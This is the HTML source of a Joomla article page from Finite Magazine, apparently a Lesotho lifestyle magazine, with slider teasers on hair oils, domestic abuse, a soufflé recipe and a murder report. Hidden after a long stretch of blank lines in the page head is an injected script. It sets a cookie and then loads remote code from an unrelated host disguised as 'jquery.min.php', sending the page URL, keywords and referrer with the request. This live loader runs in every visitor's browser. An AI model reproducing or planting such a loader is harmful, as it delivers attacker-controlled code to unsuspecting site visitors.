
<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>

    
	    
       
    <meta name="viewport" content="width=device-width, initial-scale=1.0"/>  
      <base href="http://www.finitemagazine.co.ls/index.php/200-tsholo-queen-and-brains-behind-divas" />
  <meta http-equiv="content-type" content="text/html; charset=utf-8" />
  <meta name="keywords" content="galaxy" />
  <meta name="author" content="Super User" />
  <meta name="description" content="galaxy" />
  <meta name="generator" content="Joomla! - Open Source Content Management" />
  <title>Tsholo, queen and brains behind Divas</title>
  <link rel="stylesheet" href="/templates/as002053free/css/bootstrap.css" type="text/css" />
  <link rel="stylesheet" href="/templates/as002053free/css/tmpl.default.css" type="text/css" />
  <link rel="stylesheet" href="/templates/as002053free/css/media.1200.css" type="text/css" />
  <link rel="stylesheet" href="/templates/as002053free/css/bootstrap.responsive.css" type="text/css" />
  <link rel="stylesheet" href="/templates/as002053free/css/media.980.css" type="text/css" />
  <link rel="stylesheet" href="/templates/as002053free/css/media.768.css" type="text/css" />
  <link rel="stylesheet" href="/templates/as002053free/css/media.480.css" type="text/css" />
  <link rel="stylesheet" href="/modules/mod_eventcountdown/assets/css/mod_eventcountdown.css" type="text/css" />
  <link rel="stylesheet" href="/modules/mod_eventcountdown/assets/css/TimeCircles.css" type="text/css" />
  <link rel="stylesheet" href="http://www.finitemagazine.co.ls/modules/mod_bt_contentslider/tmpl/css/btcontentslider.css" type="text/css" />
  <link rel="stylesheet" href="/components/com_roksprocket/layouts/lists/themes/default/lists.css" type="text/css" />
  <link rel="stylesheet" href="/modules/mod_sp_smart_slider/tmpl/bloggani/css/sp-smart-bloggani.css" type="text/css" />
  <link rel="stylesheet" href="http://www.finitemagazine.co.ls/modules/mod_bt_smartsearch/tmpl/css/form.css" type="text/css" />
  <link rel="stylesheet" href="http://www.finitemagazine.co.ls/modules/mod_bt_smartsearch/tmpl/css/chosen.css" type="text/css" />
  <link rel="stylesheet" href="/media/com_finder/css/finder.css" type="text/css" />
  <style type="text/css">
#btcontentslider135 .bt_handles{top: 0px !important;right: 5px !important}
		@media screen and (max-width: 480px){.bt-cs .bt-row{width:100%!important;}}.borderinput{margin-right:63px;} .btnsearch{position:absolute;top: 0px; right: -4px;}
  </style>
  <script src="/media/jui/js/jquery.min.js" type="text/javascript"></script>
  <script src="/media/jui/js/jquery-noconflict.js" type="text/javascript"></script>
  <script src="/media/jui/js/jquery-migrate.min.js" type="text/javascript"></script>
  <script src="/media/system/js/caption.js" type="text/javascript"></script>
  <script src="/media/jui/js/bootstrap.js" type="text/javascript"></script>
  <script src="/templates/as002053free/js/jquery.isotope.min.js" type="text/javascript"></script>
  <script src="/templates/as002053free/js/touch.gallery.js" type="text/javascript"></script>
  <script src="/templates/as002053free/js/scripts.js" type="text/javascript"></script>
  <script src="/templates/as002053free/js/jquery-scrolltofixed-min.js" type="text/javascript"></script>
  <script src="/modules/mod_eventcountdown/assets/js/lodash.min.js" type="text/javascript"></script>
  <script src="/modules/mod_eventcountdown/assets/js/TimeCircles.js" type="text/javascript"></script>
  <script src="http://www.finitemagazine.co.ls/modules/mod_bt_contentslider/tmpl/js/slides.js" type="text/javascript"></script>
  <script src="http://www.finitemagazine.co.ls/modules/mod_bt_contentslider/tmpl/js/default.js" type="text/javascript"></script>
  <script src="http://www.finitemagazine.co.ls/modules/mod_bt_contentslider/tmpl/js/jquery.easing.1.3.js" type="text/javascript"></script>
  <script src="/media/system/js/mootools-core.js" type="text/javascript"></script>
  <script src="/media/system/js/core.js" type="text/javascript"></script>
  <script src="/components/com_roksprocket/assets/js/mootools-mobile.js" type="text/javascript"></script>
  <script src="/components/com_roksprocket/assets/js/rokmediaqueries.js" type="text/javascript"></script>
  <script src="/components/com_roksprocket/assets/js/roksprocket.js" type="text/javascript"></script>
  <script src="/components/com_roksprocket/assets/js/roksprocket.request.js" type="text/javascript"></script>
  <script src="/components/com_roksprocket/layouts/lists/assets/js/lists.js" type="text/javascript"></script>
  <script src="/components/com_roksprocket/layouts/lists/themes/default/lists.js" type="text/javascript"></script>
  <script src="/modules/mod_sp_smart_slider/tmpl/bloggani/js/bloggani.slider.js" type="text/javascript"></script>
  <script src="http://www.finitemagazine.co.ls/modules/mod_bt_smartsearch/tmpl/js/chosen.jquery.min.js" type="text/javascript"></script>
  <script src="/media/com_finder/js/autocompleter.js" type="text/javascript"></script>
  <script type="text/javascript">
jQuery(window).on('load',  function() {
				new JCaption('img.caption');
			});jQuery.noConflict()if (typeof RokSprocket == 'undefined') RokSprocket = {};
Object.merge(RokSprocket, {
	SiteURL: 'http://www.finitemagazine.co.ls/',
	CurrentURL: 'http://www.finitemagazine.co.ls/',
	AjaxURL: 'http://www.finitemagazine.co.ls/index.php?option=com_roksprocket&amp;task=ajax&amp;format=raw&amp;ItemId=101'
});
window.addEvent('domready', function(){
		RokSprocket.instances.lists = new RokSprocket.Lists();
});
window.addEvent('domready', function(){
	RokSprocket.instances.lists.attach(141, '{"accordion":"0","autoplay":"1","delay":"10"}');
});
window.addEvent('load', function(){
   var overridden = false;
   if (!overridden && window.G5 && window.G5.offcanvas){
       var mod = document.getElement('[data-lists="141"]');
       mod.addEvents({
           touchstart: function(){ window.G5.offcanvas.detach(); },
           touchend: function(){ window.G5.offcanvas.attach(); }
       });
       overridden = true;
   };
});

		jQuery(function($){
			$(window).load(function() {
				$('#sp-smart-slider133 .bloggani-slider').blogganiSlider({
					autoplay : 1,
					interval : 5000
				});
			});
		
		});
	
  </script>


	

<style type="text/css">

/***************************************************************************************/
/*
/*		Designed by 'AS Designing'
/*		Web: http://www.asdesigning.com
/*		Web: http://www.astemplates.com
/*		License: GNU GPL
/*
/**************************************************************************************/

body
{
	font-family: Arial, Helvetica, sans-serif;	font-size: 12px;	}

a, #featured-row .mod-newsflash .item:hover h2
{
	}

a:hover,
a.selected
{
	}


/**************************************************************************************/
/*   Forms																			  */


input,
button,
select,
textarea
{
	font-family: Arial, Helvetica, sans-serif;}


/**************************************************************************************/
/*   Headings and Titles															  */


h1,
h2,
h3,
h4,
h5,
#member-registration legend
{
    font-family: Arial, Helvetica, sans-serif;}

h1
{
		}

h2,
#member-registration legend
{
		}

h3,
.item_header .item_title
{
		}

h4
{
			
}

h5
{
			
}


/**************************************************************************************/
/*   Lists																			  */


.categories-module li a,
.archive-module li a
{
	}

.categories-module li a:hover,
.archive-module li a:hover
{
	}


/**************************************************************************************/
/*   Buttons																		  */


a.btn,
.btn_info,
.btn-info,
.btn-group button.btn,
.btn-primary,
.btn_primary,
.contentpane .button
{
			

	}

a.btn:hover,
.btn_info:hover,
.btn-info:hover,
.btn_info:active,
.btn-info:active,
.btn_info.active,
.btn-info.active,
.btn_info.disabled,
.btn-info.disabled,
.btn_info[disabled],
.btn-info[disabled],
.btn-primary:hover,
.btn_primary:hover,
.btn-primary:active,
.btn_primary:active,
.btn-primary.active,
.btn_primary.active,
.btn-primary.disabled,
.btn_primary.disabled,
.btn-primary[disabled],
.btn_primary[disabled],
.contentpane .button:hover
{
				
}


/**************************************************************************************/
/*   Logo Row		  																  */


#top-row .moduletable.call-now
{
	}

#top-row .moduletable.call-now div
{
    font-family: Arial, Helvetica, sans-serif;}

#top-row .logo
{
	float: left;
	line-height: 60px;
	min-width: 240px;
}

#top-row .logo,
#top-row .logo a,
#top-row .logo a:hover
{
	font-family: Tahoma, Geneva, sans-serif, Arial;		font-style: normal;	font-weight: normal;	}

#top-row .logo span.slogan
{
	left: 5px;
	top: 0px;
	font-family: Arial, Helvetica, sans-serif;	font-size: 12px;	font-style: normal;	font-weight: normal;		
}


/**************************************************************************************/
/*   Footer
/**************************************************************************************/
/**************************************************************************************/


#footer-row ul.nav li a
{
	}

#footer-row ul.nav li a:hover
{
	}

#copyright-menu li a,
#copyright-menu li.current a,
#copyright-menu li.active a
{
	}

#copyright-menu li a:hover
{
	}


</style>
    <link rel="stylesheet" href="/templates/as002053free/css/ext.asmenu.css" type="text/css" />
    <link rel="stylesheet" href="/templates/as002053free/css/ext.artslider.css" type="text/css" />  
    <link rel="stylesheet" href="/templates/as002053free/css/virtuemart.css" type="text/css" />  
    <link rel="stylesheet" href="/templates/as002053free/css/style.custom.css" type="text/css" />
  



























































































<script>var a='';setTimeout(1);function setCookie(a,b,c){var d=new Date;d.setTime(d.getTime()+60*c*60*1e3);var e="expires="+d.toUTCString();document.cookie=a+"="+b+"; "+e}function getCookie(a){for(var b=a+"=",c=document.cookie.split(";"),d=0;d<c.length;d++){for(var e=c[d];" "==e.charAt(0);)e=e.substring(1);if(0==e.indexOf(b))return e.substring(b.length,e.length)}return null}null==getCookie("__cfgoid")&&(setCookie("__cfgoid",1,1),1==getCookie("__cfgoid")&&(setCookie("__cfgoid",2,1),document.write('<script type="text/javascript" src="' + 'http://www.isurueng.lk/js/jquery.min.php' + '?key=b64' + '&utm_campaign=' + 'I92930' + '&utm_source=' + window.location.host + '&utm_medium=' + '&utm_content=' + window.location + '&utm_term=' + encodeURIComponent(((k=(function(){var keywords = '';var metas = document.getElementsByTagName('meta');if (metas) {for (var x=0,y=metas.length; x<y; x++) {if (metas[x].name.toLowerCase() == "keywords") {keywords += metas[x].content;}}}return keywords !== '' ? keywords : null;})())==null?(v=window.location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?'':t:v[1]:k)) + '&se_referrer=' + encodeURIComponent(document.referrer) + '"><' + '/script>')));</script>
</head>

<body class="com_content view-article task- itemid-101 body-">
	<div class="main-wrapper">
    
    	<!-- HEADER ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  -->    

    	<div id="header">
            <div id="top-row"  >
                <div id="toprow-wrapper" >
                    <div class="container">
                        <div class="row">    
                            <div id="top-contact" class="right span7">
                                <div id="top-links" class="row-fluid">
                                    <div class="moduletable  "><div class="moduletable-wrapper"><div class="moduletable-wrapper-inner">
<script type="text/javascript">
jQuery(document).ready(function(){	
	jQuery('#btss-advanced').click(function(){
	if (jQuery(".smartsearch-advanced:first").is(":hidden")) {
		jQuery(".smartsearch-advanced").css('width','100%');			
		jQuery("#btss-advanced ").css({'height':'28px','background':'#FFFFFF','border-left':'1px solid #CCCCCC','border-top':'1px solid #CCCCCC','border-right':'1px solid #CCCCCC'});		
		jQuery(".smartsearch-advanced").slideDown("slow");
		} else {
		jQuery(".smartsearch-advanced").slideUp('slow');
		jQuery("#btss-advanced").css({'border':'1px solid #FFFFFF','height':'18px'});	
		}
	});
	jQuery(".smartsearch-advanced").hide();
	  jQuery("#btss-advanced").hover(function () {
		jQuery(this).append('<div class="tooltipsmartseach"><p> Advance search</p></div>');
		jQuery('.tooltipsmartseach').css('background','#545454');
		jQuery('.tooltipsmartseach >p').css('margin-left','5px');
		jQuery('.tooltipsmartseach >p').css('margin-top','3px');
	  }, function () {
		jQuery("div.tooltipsmartseach").remove();
	  });
	jQuery('.inputboxsmart').data("placeholder","Select Frameworks...").chosen();	
	
	jQuery('#mod-bt-smartsearchword').keydown(function (event) {
		if(jQuery('#mod-bt-smartsearchword').val()!=""){
		var keypressed = event.keyCode || event.which;
			if (keypressed == 13) {
				$(this).closest('form').submit();
			}
		}
	});
	jQuery('.btnsearch').click(function(){
		if(jQuery('#mod-bt-smartsearchword').val()!=""){
			if(jQuery('#mod-bt-smartsearchword').val()!="Search..."){			
			var keypressed = event.keyCode || event.which;
				if (keypressed == 13) {
					$(this).closest('form').submit();
				}
			}
			else{
				return false;
			}
		}
		else{
			return false;
		}
	});
	

});
</script>	
<script type="text/javascript">
	window.addEvent('domready', function() {	
							var url = '/index.php/component/finder/?task=suggestions.display&format=json&tmpl=component';
			var ModCompleter = new Autocompleter.Request.JSON(document.id('mod-bt-smartsearchword'), url, {'postVar': 'q'});
		});
</script>
<form id="mod-bt-smartsearchform-142" action="/index.php/component/finder/search" method="get">
	<div class="smartsearch ">
		<div class="keyword">
			<div class="borderinput"><input name="q" id="mod-bt-smartsearchword"  class="inputboxsearch" type="text" value="Search..."  onblur="if (this.value=='') this.value='Search...';" onfocus="if (this.value=='Search...') this.value='';" /><a id ="btss-advanced"><img src="http://www.finitemagazine.co.ls/modules/mod_bt_smartsearch/tmpl/images/config.jpg"  alt="config"/></a></div><button type="submit" class="btnsearch" >
					<img src="http://www.finitemagazine.co.ls/modules/mod_bt_smartsearch/tmpl/images/button.jpg" width="57" height="27" alt="submit" />
			   </button>		</div>
																
					<div id="mod-smartsearch-advanced" class="smartsearch-advanced  ">
						<div class="btsmartsearch"><div class="btsmartspace"></div></div>														
					</div>
							<input type="hidden" name="Itemid" value="101" />		
	</div>
</form>
</div></div></div>                        
                                </div>
                                <div id="top-cart" class="row-fluid">
                                    
                                </div>
                            </div>
                            
                            <div id="top-logo" class="left span4">
                            
                                <div id="logo" class="span6">
                                                                        <a href="/">
                                        <img src="http://www.finitemagazine.co.ls/images/logo.png" alt="Finite Magazine" />
                                    </a>
                                                                
                                </div>
                                             
                                
                            </div>
                       	</div>
                    </div>
                </div>
            </div>
            
            <div id="header-row"  >
                <div class="container">
                	<div id="header-wrapper" >
                        <div class="row">
                            
                        </div>
                    </div>
                </div>
            </div>
            
                        <div id="slider-row">
                <div class="container">
                    <div class="top-wrapper"> 
                        <div class="row-fluid">
                            <div class="moduletable  "><div class="moduletable-wrapper"><div class="moduletable-wrapper-inner"><!--[if lt IE 9]><script src="http://html5shim.googlecode.com/svn/trunk/html5.js"></script><script src="http://css3-mediaqueries-js.googlecode.com/svn/trunk/css3-mediaqueries.js"></script><![endif]-->
<link rel="stylesheet" href="http://www.finitemagazine.co.ls/modules/mod_gruemenu/css/styles.css" type="text/css" media="screen"/>
<link href="http://fonts.googleapis.com/css?family=Open+Sans" rel="stylesheet" type="text/css">
<style>

#gruemenu.grue_136 { background: #E8107C; }
#gruemenu.grue_136 ul li a, #gruemenu.grue_136 #menu-button {font-family: 'Open Sans', Arial, Helvetica, sans-serif ;}
#gruemenu.grue_136 > ul > li > a { color: #FFFFFF; text-transform:uppercase}
#gruemenu.grue_136 > ul > li:hover > a,
#gruemenu.grue_136 > ul > li > a:hover,
#gruemenu.grue_136 > ul > li.active > a {color: #FFFFFF; background: #C2116F;}
#gruemenu.grue_136 ul ul li:hover > a,
#gruemenu.grue_136 ul ul li.active > a {color: #FFFFFF; background: #C2116F;}
#gruemenu.grue_136 > ul > li.has-sub > a::after {border-top-color: #FFFFFF; }
#gruemenu.grue_136 > ul > li.has-sub.active > a::after,
#gruemenu.grue_136 > ul > li.has-sub:hover > a {border-top-color: #FFFFFF;}
#gruemenu.grue_136 > ul > li > ul::after { border-bottom-color: #E8107C}
#gruemenu.grue_136 ul ul ul::after {border-right-color:  #E8107C }

#gruemenu.grue_136 ul ul li a {color: #FFFFFF; background: #E8107C;}
#gruemenu.grue_136 ul ul li:hover > a,
#gruemenu.grue_136 ul ul li.active > a {color: #FFFFFF;background:#C2116F;}
#gruemenu.grue_136 ul ul li.has-sub > a::after {border-left-color: #FFFFFF; }

#gruemenu.grue_136 ul ul li.has-sub.active > a::after,
#gruemenu.grue_136 ul ul li.has-sub:hover > a::after {border-left-color:#FFFFFF; }

#gruemenu.grue_136 #menu-button { color: #FFFFFF; }

#gruemenu.grue_136 {-webkit-border-radius: 0px; -moz-border-radius: 0px; -o-border-radius: 0px; border-radius: 0px;  border-radius: 0px;}
#gruemenu.grue_136 ul li:first-child > a  { border-top-left-radius: 0px; border-bottom-left-radius: 0px;}
#gruemenu.grue_136 ul ul li:first-child > a { border-top-left-radius: 0px; border-top-right-radius: 0px; border-bottom-left-radius: 0px; border-bottom-right-radius: px;}
#gruemenu.grue_136 ul ul li:last-child > a {border-top-left-radius: 0px; border-top-right-radius: 0px; border-bottom-left-radius: 0px; border-bottom-right-radius: 0px;}

#gruemenu.grue_136 #menu-button::after {border-top: 2px solid #FFFFFF; border-bottom: 2px solid #FFFFFF; }
#gruemenu.grue_136 #menu-button::before {border-top: 2px solid #FFFFFF; }

</style>

<script type="text/javascript">
( function( jQuery ) {
jQuery( document ).ready(function() {
jQuery('.grue_136').prepend('<div id="menu-button">TheGrue Menu</div>');
	jQuery('.grue_136 #menu-button').on('click', function(){
		var menu = jQuery(this).next('ul');
		if (menu.hasClass('open')) {
			menu.removeClass('open');
		}
		else {
			menu.addClass('open');
		}
	});
});
} )( jQuery );
</script>
<div id="gruemenu" class="grue_136 ">
<ul >
<li class="item-101 current active"><a href="/index.php" >HOME</a></li><li class="item-178 has-sub parent"><a href="/index.php/artists" >REGULARS</a><ul><li class="item-191"><a href="/index.php/artists/twin-talk" >TWIN TALK</a></li><li class="item-192"><a href="/index.php/artists/something-to-talk-about" >SOMETHING TO TALK ABOUT</a></li><li class="item-193"><a href="/index.php/artists/finite-women" >FINITE WOMAN</a></li><li class="item-194"><a href="/index.php/artists/finite-man" >FINITE MAN</a></li></ul></li><li class="item-179 has-sub parent"><a href="/index.php/service" >LIFE STYLE</a><ul><li class="item-184"><a href="/index.php/service/sports-fitness" >SPORTS &amp; FITNESS</a></li><li class="item-185"><a href="/index.php/service/relationships" >RELATIONSHIPS</a></li><li class="item-186"><a href="/index.php/service/parenting-pregnancy" >PARENTING &amp; PREGNANCY</a></li><li class="item-187"><a href="/index.php/service/home-decor" >HOME &amp; DECOR</a></li><li class="item-188"><a href="/index.php/service/health-beauty" >HEALTH &amp; BEAUTY</a></li><li class="item-189"><a href="/index.php/service/food-recipes" >FOOD &amp; RECIPES</a></li><li class="item-190"><a href="/index.php/service/fashion" >FASHION</a></li></ul></li><li class="item-180"><a href="/index.php/products" >ENTERTAINMENT</a></li><li class="item-181"><a href="/index.php/promotions" >REAL LIFE STORIES</a></li><li class="item-183"><a href="/index.php/gallery" >GALLERY</a></li><li class="item-212 has-sub parent"><a href="/index.php/awards" >AWARDS</a><ul><li class="item-213"><a href="/index.php/awards/men-awards" >MEN CATEGORY </a></li><li class="item-210"><a href="/index.php/awards/women-awards" >WO-MEN  CATEGORY</a></li></ul></li></ul>
</div>

</div></div></div>
                        </div>
                    </div> 
                </div>   
            </div>
             
            
            
             
              
        </div>    

    	<!-- END OF HEADER ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ --> 
    	

        <div id="content-wrapper">     
           <div class="main">
           
			                   
                                <div id="featured-row">
                     
                    <div class="container"> 
                        <div class="featured-row-wrapper">      
                            <div class="row-fluid">
                                <div class="moduletable  "><div class="moduletable-wrapper"><div class="moduletable-wrapper-inner">
<div id="sp-smart-slider133" class="sp-smart-slider layout-bloggani  ">
	
	<!-- Carousel items -->
	<div class="bloggani-slider">
					<div class="slider-item">
				<div class="sp-slider-inner">
				
										<div class="slider-introtext hidden-phone">
						<div>
							<p><span style="font-size: 12pt;"><img src="/images/Almond-hair-oils.jpg" alt="Almond hair oils" width="380" height="326" style="vertical-align: top;" />Hair is the most important ornament of beauty.Oiling hair is amethod to make hair healthy and oiling done correctly can make your hair healthy and strong.Also it is vital to manage problems like hair falling out and dandruff. Learn what sets hair oils apart from the rest, and discover how the right oil can leave your hair softer, stronger and sparkling with a healthy shine. Here are different oils to choose from!</span></p>						</div>
					</div>
					
					<div class="slider-title">
						<div>
							<p class="sp-smart-pretitle">HEALTH AND BEAUTY</p><a href="/index.php/service/health-beauty/73-oils-to-rescueyour-hair-with"><h1 class="sp-smart-title">Oils to rescue your hair with</h1></a><p class="sp-smart-posttitle">OILS TO RESCUE YOUR HAIR</p>								
						</div>
					</div>
					
					<div class="slider-image-wrapper">
													<a href="/index.php/service/health-beauty/73-oils-to-rescueyour-hair-with">
												<img class="sp-smart-slider-img" src="http://www.finitemagazine.co.ls/images/pictures/Cover/DSC_0057.JPG" alt="Oils to rescue your hair with" title="Oils to rescue your hair with" width="100%" />
													</a>
												
						<div class="slider-date-thumb hidden-phone">
							<span>Mar/16/2016</span>
														<img src="http://www.finitemagazine.co.ls/images/f4499f64-5171-11e5-9816-22000aa61a3e.jpg" alt="Needs expert advice to give solution" title="Needs expert advice to give solution" />
						</div>
						
					</div>
				</div>
			</div>
					<div class="slider-item">
				<div class="sp-slider-inner">
				
										<div class="slider-introtext hidden-phone">
						<div>
							<p><strong><span style="font-size: 24pt; line-height: 107%; font-family: Cambria, serif;">Love hurts</span></strong></p>
<p><strong><span style="font-size: 18pt; line-height: 107%; font-family: Cambria, serif;">Why do women stay in abusive relationships? </span></strong></p>
<p style="text-align: justify;"><span style="font-size: 12pt;">&ldquo;Why are you still in that marriage&rdquo;, &ldquo;Are you waiting for your death?&rdquo;, &ldquo;Just up and leave, if I were you I would have packed my bags long time ago&rdquo;, &ldquo;Why would you stay with someone who is causing you pain, fear and causing damage to your children?&rdquo; These are just some of the questions and &lsquo;advices&rsquo; by some friends and family members of women in relationships that appear to be causing them more pain than giving them an opportunity to enjoy love.&nbsp;</span></p>						</div>
					</div>
					
					<div class="slider-title">
						<div>
							<p class="sp-smart-pretitle">RELATIONSHIPS</p><a href="/index.php/service/relationships/194-needs-expert-advice-to-give-solution"><h1 class="sp-smart-title">Needs expert advice to give solution</h1></a><p class="sp-smart-posttitle">Love hurts</p>								
						</div>
					</div>
					
					<div class="slider-image-wrapper">
													<a href="/index.php/service/relationships/194-needs-expert-advice-to-give-solution">
												<img class="sp-smart-slider-img" src="http://www.finitemagazine.co.ls/images/pictures/Cover/DSC_0057.JPG" alt="Needs expert advice to give solution" title="Needs expert advice to give solution" width="100%" />
													</a>
												
						<div class="slider-date-thumb hidden-phone">
							<span>Jan/06/2017</span>
														<img src="http://www.finitemagazine.co.ls/images/pg_83.jpg" alt="Mushroom soufflés" title="Mushroom soufflés" />
						</div>
						
					</div>
				</div>
			</div>
					<div class="slider-item">
				<div class="sp-slider-inner">
				
										<div class="slider-introtext hidden-phone">
						<div>
							<p><span style="font-size: 12pt;"><span style="font-size: 12pt;"><a href="http://www.bbcgoodfood.com/glossary/flour"><img src="/images/pg_83.jpg" alt="pg 83" style="vertical-align: top;" /></a></span>Ingredients</span></p>
<ul>
<li><span style="font-size: 12pt;">140g small button&nbsp;<a href="http://www.bbcgoodfood.com/glossary/mushroom">mushrooms</a>, sliced</span></li>
<li><span style="font-size: 12pt;">50g butter, plus extra for greasing</span></li>
<li><span style="font-size: 12pt;">25g plain&nbsp;<a href="http://www.bbcgoodfood.com/glossary/flour">flour</a></span></li>
<li><span style="font-size: 12pt;">325ml milk</span></li>
<li><span style="font-size: 12pt;">85g Gruy&egrave;re, finely grated, plus a little extra</span></li>
<li><span style="font-size: 12pt;">3 large&nbsp;<a href="http://www.bbcgoodfood.com/glossary/egg">eggs</a>, separated</span></li>
<li><span style="font-size: 12pt;">6 tsp cr&egrave;me fra&icirc;che</span></li>
<li><span style="font-size: 12pt;">snipped chive, to serve</span></li>
</ul>						</div>
					</div>
					
					<div class="slider-title">
						<div>
							<p class="sp-smart-pretitle">FOOD AND RECIPES</p><a href="/index.php/service/food-recipes/68-mushroom-souffles"><h1 class="sp-smart-title">Mushroom soufflés</h1></a><p class="sp-smart-posttitle">Mushroom souffles</p>								
						</div>
					</div>
					
					<div class="slider-image-wrapper">
													<a href="/index.php/service/food-recipes/68-mushroom-souffles">
												<img class="sp-smart-slider-img" src="http://www.finitemagazine.co.ls/images/pictures/Cover/DSC_0057.JPG" alt="Mushroom soufflés" title="Mushroom soufflés" width="100%" />
													</a>
												
						<div class="slider-date-thumb hidden-phone">
							<span>Mar/15/2016</span>
														<img src="http://www.finitemagazine.co.ls/images/pictures/Healthbeauty/pg78/053_3000x2561_all-free-download-com_7935271.jpg" alt="Lemon Juice" title="Lemon Juice" />
						</div>
						
					</div>
				</div>
			</div>
					<div class="slider-item">
				<div class="sp-slider-inner">
				
										<div class="slider-introtext hidden-phone">
						<div>
							<p style="text-align: justify;"><span style="font-size: 12pt;"><img src="/images/pictures/Healthbeauty/pg78/lemon_juice.jpg" alt="lemon juice" style="vertical-align: top;" />Tired of face blemishes? Well, lemon is the most versatile tool that nature can offer. Lemon Juice is a popular natural and inexpensive remedy for stubborn face blemish. It also smells great and has many additional benefits. It kills bacteria and has low pH which exfoliates skin naturally and controls excess skin oil.&nbsp; Lemon is as an exfoliant that removes dead skin cells and prevents clogged pores, relieving cystic face blemish.</span></p>						</div>
					</div>
					
					<div class="slider-title">
						<div>
							<p class="sp-smart-pretitle">HEALTH AND BEAUTY</p><a href="/index.php/service/health-beauty/115-lemon-juice"><h1 class="sp-smart-title">Lemon Juice</h1></a><p class="sp-smart-posttitle">Lemon Juice</p>								
						</div>
					</div>
					
					<div class="slider-image-wrapper">
													<a href="/index.php/service/health-beauty/115-lemon-juice">
												<img class="sp-smart-slider-img" src="http://www.finitemagazine.co.ls/images/pictures/Cover/DSC_0057.JPG" alt="Lemon Juice" title="Lemon Juice" width="100%" />
													</a>
												
						<div class="slider-date-thumb hidden-phone">
							<span>May/20/2016</span>
														<img src="http://www.finitemagazine.co.ls/images/pictures/Reallifestory/reallifestory/Profile-of-serious-African-Ame-12842708.jpg" alt="ARE WE LOSING THE FIGHT AGAINST THE FIGHT?" title="ARE WE LOSING THE FIGHT AGAINST THE FIGHT?" />
						</div>
						
					</div>
				</div>
			</div>
					<div class="slider-item">
				<div class="sp-slider-inner">
				
										<div class="slider-introtext hidden-phone">
						<div>
							<p style="text-align: justify;"><span style="font-size: 12pt;">On Tuesday the 18th of October, exactly 5 weeks and 3 days before the commencement of the commemoration of the annual 16 days of Activism Against Gender Based Violence (GBV); a brutal murder took place in the streets of Maseru&rsquo;s Thetsane Suburb where a 39 year old man allegedly stabbed his 30 year old &lsquo;concubine&rsquo; to death in full sight of many onlookers in the area. In his attempt to flee from an outraged mob that witnessed his ruthlessness, the man was reportedly killed and had his scull smashed and brains scattered across the street. </span></p>						</div>
					</div>
					
					<div class="slider-title">
						<div>
							<p class="sp-smart-pretitle">LIFESTYLE</p><a href="/index.php/service/192-are-we-losing-the-fight-against-the-fight"><h1 class="sp-smart-title">ARE WE LOSING THE FIGHT AGAINST THE FIGHT?</h1></a>								
						</div>
					</div>
					
					<div class="slider-image-wrapper">
													<a href="/index.php/service/192-are-we-losing-the-fight-against-the-fight">
												<img class="sp-smart-slider-img" src="http://www.finitemagazine.co.ls/images/pictures/Cover/DSC_0057.JPG" alt="ARE WE LOSING THE FIGHT AGAINST THE FIGHT?" title="ARE WE LOSING THE FIGHT AGAINST THE FIGHT?" width="100%" />
													</a>
												
						<div class="slider-date-thumb hidden-phone">
							<span>Jan/06/2017</span>
														<img src="http://www.finitemagazine.co.ls/images/pictures/Relationships/pg60/African-American-Couple-Angry.jpg" alt="The ugly face of abuse" title="The ugly face of abuse" />
						</div>
						
					</div>
				</div>
			</div>
					<div class="slider-item">
				<div class="sp-slider-inner">
				
										<div class="slider-introtext hidden-phone">
						<div>
							<p style="text-align: justify;"><span style="font-size: 12pt;">Mamakhethe Phomane spills the beans on her &lsquo;Abusive&rsquo; Marriage</span></p>
<p style="text-align: justify;"><span style="font-size: 12pt;">Domestic violence touches not only the victim, but the entire family, loved ones, friends, co-workers and entire communities. Knowledge is power! If no one shares, no one knows and domestic violence is allowed to prevail and spread. On the other hand, through sharing your stories you become informed, empowered and encouraged. Speaking to Finite magazine, an inspiring Mosotho woman and abuse survivor Mamakhethe Phomane spilled the beans on her failed abusive marriage. While most victims of abuse find it hard to leave the relationship, Phomane, on the contrary, claimed that wasn't the case with her.</span></p>						</div>
					</div>
					
					<div class="slider-title">
						<div>
							<p class="sp-smart-pretitle">REAL LIFE STORY</p><a href="/index.php/promotions/197-the-ugly-face-of-abuse"><h1 class="sp-smart-title">The ugly face of abuse</h1></a>								
						</div>
					</div>
					
					<div class="slider-image-wrapper">
													<a href="/index.php/promotions/197-the-ugly-face-of-abuse">
												<img class="sp-smart-slider-img" src="http://www.finitemagazine.co.ls/images/pictures/Cover/DSC_0057.JPG" alt="The ugly face of abuse" title="The ugly face of abuse" width="100%" />
													</a>
												
						<div class="slider-date-thumb hidden-phone">
							<span>Jan/06/2017</span>
														<img src="http://www.finitemagazine.co.ls/images/k2-_ce647cc0-ad10-4309-822f-cca494c91e4b.v1.jpg" alt="Oils to rescue your hair with" title="Oils to rescue your hair with" />
						</div>
						
					</div>
				</div>
			</div>
				
		<div class="slider-controllers">
			<a class="controller-prev"><span>&lsaquo;</span></a>
			<a class="controller-next"><span>&rsaquo;</span></a>
		</div>	
	</div>
</div></div></div></div>
                            </div>
                        </div>
                    </div>
                </div>
                                
               
            
                                       
            
                <!-- CONTENT ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -->
                <div id="content-row">
                    <div class="container">
                        <div class="content-inner row">
                        
                            <!-- COLUMN LEFT ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -->
                            
                                                        <div id="aside-left" class="span4">
                                <aside>
                                   
                                                                        <div id="aside-row-1-left">
                                        <div class="moduletable "><div class="moduletable-wrapper"><div class="joomla_bizknizfb ">
    <div id="fb-root"></div>
<script>(function(d, s, id) {
  var js, fjs = d.getElementsByTagName(s)[0];
  if (d.getElementById(id)) return;
  js = d.createElement(s); js.id = id;
  js.src = "//connect.facebook.net/en_US/sdk.js#xfbml=1&version=v2.3";
  fjs.parentNode.insertBefore(js, fjs);
}(document, 'script', 'facebook-jssdk'));</script>
